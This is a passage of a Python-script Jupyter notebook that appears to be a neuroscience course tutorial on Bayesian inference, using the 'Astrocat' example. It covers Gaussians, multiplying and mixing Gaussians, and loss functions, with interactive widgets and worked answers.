def plot_bayes_loss_utility_gamma(loss_f, mu_true, alpha, beta, offset, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
prior = gamma_pdf(x-offset, alpha, beta)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility_mixture(loss_f, mu_true, mu_m1, mu_m2, sigma_m1, sigma_m2, factor, mu, sigma):
x = np.linspace(-7, 7, 1000, endpoint=True)
y_1 = gaussian(x, mu_m1, sigma_m1)
y_2 = gaussian(x, mu_m2, sigma_m2)
prior = y_1 * factor + y_2 * (1.0 - factor)
likelihood = gaussian(x, mu, sigma)
posterior = np.multiply(prior, likelihood)
posterior = posterior / (posterior.sum() * (x[1] - x[0]))
loss = calc_loss_func(loss_f, mu_true, x)
plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f)
return None
def plot_bayes_loss_utility(x, prior, likelihood, posterior, loss, loss_f):
mean, median, mode = calc_mean_mode_median(x, posterior)
expected_loss = calc_expected_loss(loss_f, posterior, x)
min_expected_loss = x[np.argmin(expected_loss)]
plt.figure(figsize=(12, 8))
plt.subplot(2, 2, 1)
plt.title("Prior and Likelihood")
plt.plot(x, prior, c='b', label='prior')
plt.fill_between(x, prior, color='b', alpha=0.2)
plt.plot(x, likelihood, c='r', label='likelihood')
plt.fill_between(x, likelihood, color='r', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
plt.xlabel('x')
plt.subplot(2, 2, 2)
plt.title("Posterior")
plt.plot(x, posterior, c='k', label='posterior')
plt.fill_between(x, posterior, color='k', alpha=0.1)
plt.axvline(mean, ls='dashed', color='red', label='Mean')
plt.axvline(median, ls='dashdot', color='blue', label='Median')
plt.axvline(mode, ls='dotted', color='green', label='Mode')
plt.legend(loc="upper left")
plt.yticks([])
plt.xlabel('x')
plt.subplot(2, 2, 3)
plt.title(loss_f)
plt.plot(x, loss, c='c', label=loss_f)
# plt.fill_between(x, loss, color='c', alpha=0.2)
plt.ylabel('loss')
plt.xlabel('x')
plt.subplot(2, 2, 4)
plt.title("expected loss")
  plt.plot(x, expected_loss, c='y', label=r'$\mathbb{E}[L]$')
# plt.fill_between(x, expected_loss, color='y', alpha=0.2)
  plt.axvline(min_expected_loss, ls='dashed', color='red', label=r'$Min~ \mathbb{E}[Loss]$')
plt.legend(loc="lower right")
plt.xlabel('x')
  plt.ylabel(r'$\mathbb{E}[L]$')
plt.show()
def loss_plot_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_loss_utility_gaussian,
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_estimate", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_estimate", continuous_update=False),
mu_true = FloatSlider(min=-3.0, max=3.0, step=0.01, value=0.0, description="µ_true", continuous_update=False))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_loss_utility_mixture,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_est_1", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_est_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_est_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_est_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu_true = FloatSlider(min=-3.0, max=3.0, step=0.01, value=0.0, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
def plot_prior_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Uniform":
widget = interact(plot_utility_uniform,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Gamma":
widget = interact(plot_utility_gamma,
alpha = FloatSlider(min=1.0, max=10.0, step=0.1, value=2.0, description="α_prior", continuous_update=False),
beta = FloatSlider(min=0.5, max=2.0, step=0.01, value=1.0, description="β_prior", continuous_update=False),
offset = FloatSlider(min=-6.0, max=2.0, step=0.1, value=0.0, description="offset", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_utility_mixture,
mu_m1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_mix_1", continuous_update=False),
                      mu_m2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_mix_2", continuous_update=False),
sigma_m1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_1", continuous_update=False),
sigma_m2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
def plot_bayes_loss_utility_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_bayes_loss_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Uniform":
widget = interact(plot_bayes_loss_utility_uniform,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Gamma":
widget = interact(plot_bayes_loss_utility_gamma,
alpha = FloatSlider(min=1.0, max=10.0, step=0.1, value=2.0, description="α_prior", continuous_update=False),
beta = FloatSlider(min=0.5, max=2.0, step=0.01, value=1.0, description="β_prior", continuous_update=False),
offset = FloatSlider(min=-6.0, max=2.0, step=0.1, value=0.0, description="offset", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_bayes_loss_utility_mixture,
mu_m1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_mix_1", continuous_update=False),
                      mu_m2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_mix_2", continuous_update=False),
sigma_m1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_1", continuous_update=False),
sigma_m2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
# + cellView="form"
# @title Helper functions
def gaussian(x, μ, σ):
return np.exp(-((x - μ) / σ)**2 / 2) / np.sqrt(2 * np.pi * σ**2)
def gamma_pdf(x, α, β):
return gamma_distribution.pdf(x, a=α, scale=1/β)
def mvn2d(x, y, mu1, mu2, sigma1, sigma2, cov12):
mvn = multivariate_normal([mu1, mu2], [[sigma1**2, cov12], [cov12, sigma2**2]])
return mvn.pdf(np.dstack((x, y)))
def product_guassian(mu1, mu2, sigma1, sigma2):
J_1, J_2 = 1/sigma1**2, 1/sigma2**2
J_3 = J_1 + J_2
mu_prod = (J_1*mu1/J_3) + (J_2*mu2/J_3)
sigma_prod = np.sqrt(1/J_3)
return mu_prod, sigma_prod
def reverse_product(mu3, sigma3, mu1, mu2):
J_3 = 1/sigma3**2
J_1 = J_3 * (mu3 - mu2) / (mu1 - mu2)
J_2 = J_3 * (mu3 - mu1) / (mu2 - mu1)
sigma1, sigma2 = 1/np.sqrt(J_1), 1/np.sqrt(J_2)
return sigma1, sigma2
def calc_mean_mode_median(x, y):
  """Compute the mean, median, and mode of a pdf y evaluated on the grid x."""
pdf = y * (x[1] - x[0])
# Calc mode of an arbitrary function
mode = x[np.argmax(pdf)]
# Calc mean of an arbitrary function
mean = np.multiply(x, pdf).sum()
# Calc median of an arbitrary function
cdf = np.cumsum(pdf)
idx = np.argmin(np.abs(cdf - 0.5))
median = x[idx]
return mean, median, mode
def calc_expected_loss(loss_f, posterior, x):
dx = x[1] - x[0]
expected_loss = np.zeros_like(x)
for i in np.arange(x.shape[0]):
loss = calc_loss_func(loss_f, x[i], x) # or mse or zero_one_loss
expected_loss[i] = np.sum(loss * posterior) * dx
return expected_loss
def plot_mixture_prior(x, gaussian1, gaussian2, combined):
"""
DO NOT EDIT THIS FUNCTION !!!
Plots a prior made of a mixture of gaussians
Args:
x (numpy array of floats): points at which the likelihood has been evaluated
gaussian1 (numpy array of floats): normalized probabilities for Gaussian 1 evaluated at each `x`
gaussian2 (numpy array of floats): normalized probabilities for Gaussian 2 evaluated at each `x`
    combined (numpy array of floats): normalized probabilities for the Gaussian mixture evaluated at each `x`
Returns:
Nothing
"""
fig, ax = plt.subplots()
  ax.plot(x, gaussian1, '--b', linewidth=2, label='Gaussian 1')
  ax.plot(x, gaussian2, '-.b', linewidth=2, label='Gaussian 2')
  ax.plot(x, combined, '-r', linewidth=2, label='Gaussian Mixture')
ax.legend()
ax.set_ylabel('Probability')
ax.set_xlabel('Orientation (Degrees)')
def gaussian_mixture(mu1, mu2, sigma1, sigma2, factor):
assert 0.0 < factor < 1.0
x = np.linspace(-7.0, 7.0, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
mixture = y_1 * factor + y_2 * (1.0 - factor)
plt.figure(figsize=(8, 6))
plt.plot(x, y_1, c='deepskyblue', label='p(x)', linewidth=3.0)
plt.fill_between(x, y_1, color='deepskyblue', alpha=0.2)
plt.plot(x, y_2, c='aquamarine', label='p(y)', linewidth=3.0)
plt.fill_between(x, y_2, color='aquamarine', alpha=0.2)
  plt.plot(x, mixture, c='b', label=r'$\pi \cdot p(x) + (1-\pi) \cdot p(y)$', linewidth=3.0)
plt.fill_between(x, mixture, color='b', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.show()
# -
# ---
# # Section 1: Astrocat!
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="d09647fd-afdc-4f94-a727-042502ce12ee"
# @title Video 1: Astrocat!
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='D7Z-aTX92Pk', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# Remember, in this example, you can think of yourself as a scientist trying to decide where we believe Astrocat is, how to select a point estimate (a single guess of location) based on possible errors, and how to account for the uncertainty we have about the location of the satellite and the space mouse. In fact, this is the kind of problem real scientists working to control remote satellites face! We can also think of it as what your brain does when it selects a target for a movement or tries to hit a tennis ball! A number of classic experiments use this kind of framing to study how *optimal* human decisions and movements are. Some examples are in the further reading document.
# ---
# # Section 2: Probability distribution of Astrocat location
#
#
# We are going to think first about how Ground Control should estimate Astrocat's position. We won't consider measurements yet, just how to represent the uncertainty we might have in general. We are now dealing with a continuous distribution - Astrocat's location can be any real number. In the last tutorial, we were dealing with a discrete distribution - the fish were either on one side or the other.
#
# So how do we represent the probability of each possible point (an infinite number of them) where Astrocat could be?
# The Bayesian approach can be used with any probability distribution. While many variables in the world require complex or unknown (e.g., empirical) distributions, we will be using the Gaussian distribution or extensions of it.
# ## Section 2.1: The Gaussian distribution
#
# One distribution we will use throughout this tutorial is the **Gaussian distribution**, which is also sometimes called the normal distribution.
#
# This is a special, and commonly used, distribution for a couple of reasons. It is actually the focus of one of the most important theorems in statistics: the Central Limit Theorem. This theorem tells us that if you sum a large number of samples of a variable, that sum is normally distributed *no matter what* the original distribution of the variable was. This is a bit too in-depth for us to get into now but check out links in the Bonus for more information. Additionally, Gaussians have some really nice mathematical properties that permit simple closed-form solutions to several important problems. As we will see later in this tutorial, we can extend Gaussians to be even more flexible and to closely approximate other distributions using mixtures of Gaussians. In short, the Gaussian is probably the most important continuous distribution to understand and use.
#
#
# Gaussians have two parameters. The **mean** $\mu$ sets the location of its center. Its "scale" or spread is controlled by its **standard deviation** $\sigma$ or its square, the **variance** $\sigma^2$. These are easy to mix up: make sure you are careful about whether you are referring to (or using) the standard deviation or the variance.
#
# The equation for a Gaussian distribution on a variable $x$ is:
#
# $$
# \mathcal{N}(\mu,\sigma^2) = \frac{1}{\sqrt{2\pi\sigma^2}}\exp\left(\frac{-(x-\mu)^2}{2\sigma^2}\right)
# $$
#
# In our example, $x$ is the location of the Astrocat in one direction. $\mathcal{N}(\mu,\sigma^2)$ is a standard notation to refer to a **N**ormal (Gaussian) distribution. For example, $\mathcal{N}(0, 1)$ denotes a Gaussian distribution with mean 0 and variance 1. The exact form of this equation is not particularly intuitive, but we will see how mean and standard deviation values affect the probability distribution.
#
#
# We won't implement a Gaussian distribution in code here but please refer to the pre-reqs refresher W0D5 T1 to do this if you need further clarification.
#
# + cellView="form"
# @markdown Execute this cell to enable the function `gaussian`
def gaussian(x, μ, σ):
return np.exp(-((x - μ) / σ)**2 / 2) / np.sqrt(2 * np.pi * σ**2)
# -
# ### Interactive Demo 2.1: Exploring Gaussian parameters:
#
# Let's explore how the parameters of a Gaussian affect the distribution. Play with the demo below by changing the mean $\mu$ and standard deviation $\sigma$.
#
# Discuss the following:
#
# 1. What does increasing $\mu$ do? What does increasing $\sigma$ do?
# 2. If you wanted to know the probability of an event happening at $0$, can you find two different $\mu$ and $\sigma$ values that produce the same probability of an event at $0$?
# 3. How many Gaussians could produce the same probability at $0$?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_gaussian,
μ = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.0, continuous_update=False),
σ = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, continuous_update=False))
# +
# to_remove explanation
#. 1. Increasing u moves the distribution to the right along the x-axis. The center
#. of the distribution equals u - which makes sense as this is the mean! Increasing
#. the standard deviation makes the distribution wider.
#. 2. Yes, you can! For example, keep the standard deviation the same and move the mean
#. from -2 to 2. At both of these, the probability at 0 is the same because the distribution
#. is symmetrical.
#. 3. There are an infinite number of Gaussians (combinations of mean & standard deviation)
#. that could produce the same probability at 0
# -
# ## Section 2.2: Multiplying Gaussians
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="bdb6b0e4-b0fa-4603-ef5c-cf0e0a3b6834"
# @title Video 2: Multiplying Gaussians
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='areR25_0FyY', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# When we multiply Gaussians, we are not multiplying random variables but the actual underlying distributions. If we multiply two Gaussian distributions, with means $\mu_1$ and $\mu_2$ and standard deviations $\sigma_1$ and $\sigma_2$, we get another Gaussian. The Gaussian resulting from the multiplication will have mean $\mu_3$ and standard deviation $\sigma_3$ where:
#
# $$
# \mu_{3} = a\mu_{1} + (1-a)\mu_{2}
# $$
# $$
# \sigma_{3}^{-2} = \sigma_{1}^{-2} + \sigma_{2}^{-2}\\
# a = \frac{\sigma_{1}^{-2}}{\sigma_{1}^{-2} + \sigma_{2}^{-2}}
# $$
#
# This may look confusing but keep in mind that the information in a Gaussian is the inverse of its variance: $\frac{1}{\sigma^2}$. Basically, when multiplying Gaussians, the mean of the resulting Gaussian is a weighted average of the original means, where the weights are proportional to the amount of information of that Gaussian. The information in the resulting Gaussian is equal to the sum of informations of the original two. We'll dive into this in the next demo.
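# We can check these formulas numerically. Below is a small self-contained sketch (it mirrors this notebook's `product_guassian` helper): with equal standard deviations, the combined mean is the simple average and the information doubles; with a very uncertain second Gaussian, the result leans almost entirely on the first mean.

```python
import numpy as np

def product_of_gaussians(mu1, sigma1, mu2, sigma2):
    # Information (precision) is the inverse variance
    j1, j2 = 1 / sigma1**2, 1 / sigma2**2
    j3 = j1 + j2
    mu3 = (j1 * mu1 + j2 * mu2) / j3  # precision-weighted average of the means
    sigma3 = np.sqrt(1 / j3)          # information adds, so variance shrinks
    return mu3, sigma3

# Equal uncertainty: the combined mean is the midpoint, sigma shrinks by sqrt(2)
mu3, sigma3 = product_of_gaussians(-2.0, 0.5, 2.0, 0.5)
print(mu3, sigma3)  # 0.0, ~0.354

# Very uncertain second measurement: the result sits almost on top of mu1
mu3_skewed, _ = product_of_gaussians(-2.0, 0.5, 2.0, 11.0)
```

Note that only the relative precisions matter for the combined mean, which is why many different $\sigma$ pairs produce the same $\mu_3$.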
# ### Interactive Demo 2.2: Multiplying Gaussians
#
# We have implemented the multiplication of two Gaussians for you. Using the following widget, we are going to think about the information in, and the combination of, two Gaussians. In our case, imagine we want to find the middle location between the satellite and the space mouse. This would be the center (average) of the two locations. Because we have uncertainty about each location, we need to weight each one by how much information we have about it when estimating the most likely center.
#
# In this demo, $\mu_{1}$ and $\sigma_{1}$ are the mean and standard deviation of the distribution over satellite location, $\mu_{2}$ and $\sigma_{2}$ are the mean and standard deviation of the distribution over space mouse location, and $\mu_{3}$ and $\sigma_{3}$ are the mean and standard deviation of the distribution over the center location (gained by multiplying the first two).
#
# Questions:
#
# 1. How much uncertainty (information) do you have about $\mu_{3}$ with $\mu_{1} = -2, \mu_{2} = 2, \sigma_{1} = \sigma_{2} = 0.5$?
# 2. What happens to your estimate of $\mu_{3}$ as $\sigma_{2} \to \infty$? (In this case, $\sigma$ only goes to 11... but that should be loud enough.)
# 3. What is the difference in your estimate of $\mu_{3}$ if $\sigma_{1} = \sigma_{2} = 11$? What has changed from the first example?
# 4. Set $\mu_{1} = -4, \mu_{2} = 4$ and change the $\sigma$s so that $\mu_{3}$ is close to $2$. How many $\sigma$s will produce the same $\mu_{3}$?
# 5. Continuing, if you set $\mu_{1} = 0$, what $\sigma$ do you need to change so that $\mu_{3} \approx 2$?
# 6. If $\sigma_{1} = \sigma_{2} = 0.1$, how much information do you have about the average?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_information,
mu1 = FloatSlider(min=-5.0, max=-0.51, step=0.01, value=-2.0, description="µ_1",continuous_update=False),
mu2 = FloatSlider(min=0.5, max=5.01, step=0.01, value=2.0, description="µ_2",continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=11.01, step=0.01, value=1.0, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=11.01, step=0.01, value=1.0, description="σ_2", continuous_update=False)
)
# +
# to_remove explanation
#. 1) Information is ~ 1/variance, so the new information you have is roughly 1/(0.5^2 + 0.5^2)
#. (compared to 1/0.5^2) for each original measurement.
#. 2) The estimate will be almost entirely dependent on the mu_{1}! There is almost no
#. information from mu_{2}.
#. 3) Because the variances are the same, the amount of information you have about the center
#. is lower (very low in fact), but the mean doesn't change!
#. 4) There are an infinite number of variances that will produce the same (relative) weighting.
#. The only thing that matters is the relative means and relative variances!
#. 5) This is the same intuition, it's the relative weightings that matter, so you can only
#. think about the result (in this case the variance of the second Gaussian) relative to
#. the first.
#. 6) As the variances -> zero, the amount of information goes to infinity!
# -
# To start thinking about how we might use these concepts directly in systems neuroscience, imagine you want to know how much information is gained combining (averaging) the response of two neurons that represent locations in sensory space (think: how much information is shared by their receptive fields). You would be multiplying Gaussians!
# ## Section 2.3: Mixtures of Gaussians
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="03026396-5fe8-408a-8998-8ecfbb5f4e89"
# @title Video 3: Mixtures of Gaussians
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='5zoRO10urSk', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
#
# What if our continuous distribution isn't well described by a single bump? For example, what if the Astrocat is often either in one place or another - a Gaussian distribution would not capture this well! We need a multimodal distribution. Luckily, we can extend Gaussians into a *mixture of Gaussians*, which are more complex distributions.
#
# In a Gaussian mixture distribution, you are essentially adding two or more weighted standard Gaussian distributions (and then normalizing so everything integrates to 1). Each component Gaussian is described, as usual, by its mean and standard deviation. The additional parameters in a mixture of Gaussians are the weights you put on each Gaussian ($\pi$). The following demo should help clarify how a mixture of Gaussians relates to its standard Gaussian components. We will not cover the derivation here, but you can work it out as a bonus exercise.
#
# Mixture distributions are a common tool in Bayesian modeling and an important tool in general.
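# As a quick sanity check on the construction above: a weighted sum of normalized densities is itself normalized. A minimal self-contained sketch (the component means, standard deviations, and weight are arbitrary choices):

```python
import numpy as np

def gaussian(x, mu, sigma):
    return np.exp(-((x - mu) / sigma)**2 / 2) / np.sqrt(2 * np.pi * sigma**2)

x = np.linspace(-7, 7, 1000)
pi_w = 0.3  # mixing weight on the first component
mixture = pi_w * gaussian(x, -1.0, 0.5) + (1 - pi_w) * gaussian(x, 1.0, 0.5)

# Each component integrates to 1, so the pi-weighted sum does too
area = mixture.sum() * (x[1] - x[0])
print(round(area, 3))  # ~1.0
```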
#
#
# ### Interactive Demo 2.3: Exploring Gaussian mixtures
#
# We will examine a mixture of two Gaussians. We will have one weighting parameter, $\pi$, that tells us how to weight one of the Gaussians. The other is weighted by $1 - \pi$.
#
# Use the following widget to experiment with the parameters of each Gaussian and the mixing weight ($\pi$) to understand how the mixture of Gaussians distribution behaves.
#
# Discuss the following questions:
#
# 1. What does increasing the weight $\pi$ do to the mixture distribution (dark blue)?
# 2. How can you make the two bumps of the mixture distribution further apart?
# 3. Can you make the mixture distribution have just one bump (like a Gaussian)?
# 4. Any other shapes you can make the mixture distribution resemble other than one nicely rounded bump or two separate bumps?
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(gaussian_mixture,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_1", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_2", continuous_update=False),
factor = FloatSlider(min=0.1, max=0.9, step=0.01, value=0.5, description="π", continuous_update=False))
# +
# to_remove explanation
#. 1) Increasing the weight parameter makes the mixture distribution more closely
#. resemble p(x). This makes sense because it is weighting p(x) in the sum of Gaussians.
#. 2) You can move the two bumps of the mixture model further apart by making the means
#. u_1 and u_2 of the two Gaussians more different (having one at -4 and one at 4 for
#. example)
#. 3) If you make the means of the two Gaussians very similar, the mixture will resemble
#. a single Gaussian (u_1 = 0.25, u_2 = 0.3 for example)
#. 4) You can make a bunch of shapes if the two Gaussian components overlap at all.
#. If they're completely separated, you'll just get two Gaussian looking bumps
#.
# -
# ---
# # Section 3: Utility
#
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="9181fbbb-fb37-4803-ad74-c9b3538da07d"
# @title Video 4: Utility
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='I5H7Anh3FXs', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# We want to know where Astrocat is. If we were asked to provide the coordinates, for example to display them for Ground Control or to note them in a log, we are not going to provide the whole probability distribution! We will give a single set of coordinates, but we first need to estimate those coordinates. Just like in the last tutorial, this may not be as simple as reporting the most likely value: we want to know how good or bad it is if we guess a certain location and Astrocat is in another.
#
#
# As we have seen, utility represents the gain (or if negative, loss) for us if we take a certain action for a certain value of the hidden state. In our continuous example, we need a function to be able to define the utility with respect to all possible continuous values of the state. Our action here is our guess of the Astrocat location.
#
# We are going to explore this for the Gaussian distribution, where our estimate is $\hat{\mu}$ and the true hidden state we are interested in is $\mu$.
#
# A loss function determines the "cost" (or penalty) of estimating $\hat \mu$ when the true or correct quantity is really $\mu$ (this is essentially the cost of the error between the true hidden state we are interested in: $\mu$ and our estimate: $\hat \mu$). A loss function is equivalent to a negative utility function.
#
# ## Section 3.1: Standard loss functions
#
# There are lots of possible loss functions. We will focus on three: **mean squared error**, where the loss is the squared difference between truth and estimate; **absolute error**, where the loss is the absolute difference between truth and estimate; and **zero-one loss**, where the loss is 1 unless we're exactly right (the estimate equals the truth). We can represent these with the following formulas:
#
# $$
# \begin{eqnarray}
# \textrm{Mean Squared Error} &=& (\mu - \hat{\mu})^2 \\
# \textrm{Absolute Error} &=& \big|\mu - \hat{\mu}\big| \\
# \textrm{Zero-One Loss} &=& \begin{cases}
# 0,& \textrm{if } \mu = \hat{\mu} \\
# 1, & \textrm{otherwise}
# \end{cases}
# \end{eqnarray}
# $$
#
# We will now explore how these different loss functions change our expected utility!
#
# Check out the next cell to see the implementation of each loss in the function `calc_loss_func`.
#
# + cellView="form"
# @markdown Execute this cell to enable the function `calc_loss_func`
def calc_loss_func(loss_f, mu_true, x):
error = x - mu_true
if loss_f == "Mean Squared Error":
loss = (error)**2
elif loss_f == "Absolute Error":
loss = np.abs(error)
elif loss_f == "Zero-One Loss":
    loss = (np.abs(error) >= 0.03).astype(float)
return loss
# -
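# Before the demo, we can verify numerically that each loss picks out a different point estimate: the expected squared error is minimized at the posterior mean, and the expected absolute error at the median. A self-contained sketch (the skewed two-Gaussian posterior below is an arbitrary illustration, not the demo's exact distribution):

```python
import numpy as np

x = np.linspace(-7, 7, 2001)
dx = x[1] - x[0]

# A skewed posterior: an unequal mixture of two Gaussians
posterior = (0.7 * np.exp(-((x + 1) / 0.5)**2 / 2)
             + 0.3 * np.exp(-((x - 2) / 1.0)**2 / 2))
posterior /= posterior.sum() * dx  # normalize on the grid

mean = np.sum(x * posterior) * dx
median = x[np.argmin(np.abs(np.cumsum(posterior * dx) - 0.5))]
mode = x[np.argmax(posterior)]

# Expected loss for every candidate estimate mu_hat on the grid
exp_mse = np.array([np.sum((x - m)**2 * posterior) * dx for m in x])
exp_abs = np.array([np.sum(np.abs(x - m) * posterior) * dx for m in x])

# MSE is minimized at the mean; absolute error at the median
print(x[np.argmin(exp_mse)], mean)
print(x[np.argmin(exp_abs)], median)
```

Because this posterior is skewed, the mean, median, and mode all differ, so the three losses recommend three different guesses.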
# ### Interactive demo 3: Exploring Loss with different distributions
#
# Let's see how our loss functions interact with probability distributions to affect expected utility and consequently, the action we take.
#
# Play with the widget below and discuss the following:
#
# 1. With a Gaussian distribution, does the peak of the expected utility ever change position on the x-axis for the three different losses? This peak denotes the action we would choose (the location we would guess) so in other words, would the different choices of loss function affect our action?
